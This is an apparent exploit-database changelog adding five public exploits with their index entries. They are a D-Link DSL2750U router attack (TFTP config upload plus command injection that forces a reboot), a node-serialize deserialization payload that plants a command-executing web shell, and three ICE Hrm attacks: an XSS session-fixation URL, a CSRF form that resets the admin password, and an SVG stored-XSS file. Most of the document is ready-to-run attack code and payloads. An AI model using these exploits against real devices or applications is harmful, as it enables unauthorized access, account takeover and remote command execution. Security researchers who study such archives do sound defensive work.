DB: 2021-06-19

5 changes to exploits/shellcodes

Dlink DSL2750U - 'Reboot' Command Injection

ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation
ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)
ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
Node.JS - 'node-serialize' Remote Code Execution (3)

exploits/hardware/remote/50034.txt

@@ -0,0 +1,109 @@
+# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
+# Date: 17-06-2021
+# Exploit Author: Mohammed Hadi (HadiMed)
+# Vendor Homepage: https://me.dlink.com/consumer
+# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16
+# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
+# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) 
+
+### 
+
+#!/bin/bash
+
+# Exploit by HadiMed 
+
+# Takes advantage of the tftp server that accepts the cfg file blindly 
+echo -ne "\n"
+echo "Exploiting Dlink DSL-2750u version 1.6"
+echo -ne "\n\n"
+
+# Sending the payload 
+echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
+echo -ne "\n"
+
+echo "File uploaded Successfully"
+echo "Waiting for router to restart"
+
+sleep 180 # approximate time for router to restart 
+
+python3 exploit.py
+
+###
+
+import requests 
+
+# HTTP request looks like this 
+'''
+POST /cgi-bin/webproc HTTP/1.1
+Host: 192.168.1.1
+Content-Length: 175
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.1/cgi-bin/webproc
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
+Connection: close
+
+getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 
+'''
+
+# 1 Getting a session id 
+
+# password and username crafted by me on the cfg.xml file 
+
+username = "pwned"
+password= "pwned"
+
+
+# acually the client set the sessionid in condition that the password and username are correct
+
+Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
+Contentty="application/x-www-form-urlencoded"
+Referer="http://192.168.1.1/cgi-bin/webproc"
+Contentlen="175" 
+
+# Sending first request to set our session id 
+response = requests.post("http://192.168.1.1/cgi-bin/webproc",
+	headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
+,	
+	data={	"getpage":"html/index.html",
+	      	"errorpage":"html/main.html",
+	      	"var:menu" : "setup",
+		"var:page":"wizard",
+		"obj-action":"auth",
+		":username":username,
+		":password":password,
+		":action":"login",
+		":sessionid":"deadbeef"
+}
+	)
+
+
+Referer = "http://192.168.1.1/cgi-bin/webupg"
+
+name = "mac"
+cmd = "1;sleep${IFS}10;reboot;"
+
+Contentlen = str(len(name+cmd)+10)
+
+if response.status_code==302:
+	print("got sessionid=deadbeef !\n waiting for the reverse shell ...") 
+
+# access cgi-bin/webupg
+try :
+	response = requests.post("http://192.168.1.1/cgi-bin/webupg",
+        headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
+        ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001
+
+)
+
+except requests.exceptions.Timeout :
+
+	print("done router will restart in 20 sec") 	
+
+print("Device restarted!")

exploits/nodejs/webapps/50036.js

@@ -0,0 +1,23 @@
+# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3)
+# Date: 17.06.2021
+# Exploit Author: Beren Kuday GORUN
+# Vendor Homepage: https://github.com/luin/serialize
+# Software Link: https://github.com/luin/serialize
+# Version: 0.0.4
+# Tested on: Windows & Ubuntu
+# CVE : 2017-5941
+
+var serialize = require('node-serialize');
+var payload = {
+    "webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps  = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()"
+    }
+serialize.unserialize(serialize.serialize(payload))
+
+/*
+# after being exploited
+
+┌──(root@kali)-[/home/kali]
+└─# curl http://10.0.2.4:443?cmd=whoami
+nodeadmin
+
+*/

exploits/php/webapps/50030.txt

@@ -0,0 +1,20 @@
+# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation
+# Exploit Author: *Piyush Patil *& Rafal Lykowski
+# Vendor Homepage: https://icehrm.com/
+# Version: 29.0.0.OS
+# Tested on: Windows 10 and Kali
+
+#Description
+ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover.
+
+#Steps to reproduce the attack:
+1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode)
+2-Log in to the system, 
+3-Paste this payload into the address bar and load it:
+http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f
+It simulates victim executing XSS.
+4-In the incognito window do not log in but just modify session cookie value to 12345.
+5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over.
+
+#Video POC:
+https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing

exploits/php/webapps/50031.txt

@@ -0,0 +1,35 @@
+# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)
+# Exploit Author: *Piyush Patil* & Rafal Lykowski
+# Vendor Homepage: https://icehrm.com/
+# Version: 29.0.0.OS
+# Tested on: Windows 10 and Kali
+
+#Description
+ICE Hrm Version 29.0.0.OS is vulnerable to CSRF which allows attacker to add new admin account or change the password leading to full account takeover.
+
+#Steps to reproduce the attack:
+1- Login as victim
+2- Open the CSRF malicious file which I have attached (csrf_POC.html)
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://localhost:8070/app/service.php">
+      <input type="hidden" name="t" value="User" />
+      <input type="hidden" name="a" value="ca" />
+      <input type="hidden" name="sa" value="changePassword" />
+      <input type="hidden" name="mod" value="admin&#61;users" />
+      <input type="hidden" name="req"
+value="&#123;"id"&#58;1&#44;"pwd"&#58;"Hacker123&#35;"&#125;"
+/>
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+3- Password is changed (you can also add new admin user)
+
+Now you can simply takeover the account
+
+#Video POC:
+https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing

exploits/php/webapps/50032.xml

@@ -0,0 +1,28 @@
+# Exploit Title: ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)
+# Exploit Author: *Piyush Patil *& Rafal Lykowski
+# Vendor Homepage: https://icehrm.com/
+# Version: 29.0.0.OS
+# Tested on: Windows 10 and Kali
+
+#Description
+The file upload feature in ICE Hrm Version 29.0.0.OS allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability.
+
+#Steps to Reproduce the issue:
+1- Login to ICE Hrm Admin Panel
+2- Click on Employees=>Document Management=> Upload a below xml file
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
+http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <rect width="300" height="100"
+style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
+   <script type="text/javascript">
+      alert("XSS");
+   </script>
+</svg>
+
+3- Visit the upload location of file and XSS will get triggered.
+
+#Video POC:
+https://drive.google.com/file/d/1SnMsIhOJKBq4Pnotgm0nw1Pz7TypPsoQ/view?usp=sharing

files_exploits.csv

@@ -18509,6 +18509,7 @@ id,file,description,date,author,type,platform,port
 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
+50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42589,6 +42590,7 @@ id,file,description,date,author,type,platform,port
 46852,exploits/php/webapps/46852.txt,"DeepSound 1.0.4 - SQL Injection",2019-05-16,"Mehmet EMIROGLU",webapps,php,80
 46864,exploits/php/webapps/46864.txt,"Interspire Email Marketer 6.20 - 'surveys_submit.php' Remote Code Execution",2019-05-17,"numan türle",webapps,php,
 46869,exploits/php/webapps/46869.py,"eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution",2019-05-20,liquidsky,webapps,php,
+50030,exploits/php/webapps/50030.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation",2021-06-18,"Piyush Patil",webapps,php,
 46881,exploits/php/webapps/46881.txt,"Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting",2019-05-21,"Dionach Ltd",webapps,php,
 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,
 46885,exploits/java/webapps/46885.txt,"Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection",2019-05-21,omurugur,webapps,java,
@@ -44180,3 +44182,6 @@ id,file,description,date,author,type,platform,port
 50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php,
 50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,
+50031,exploits/php/webapps/50031.txt,"ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF)",2021-06-18,"Piyush Patil",webapps,php,
+50032,exploits/php/webapps/50032.xml,"ICE Hrm 29.0.0.OS - 'xml upload' Stored Cross-Site Scripting (XSS)",2021-06-18,"Piyush Patil",webapps,php,
+50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,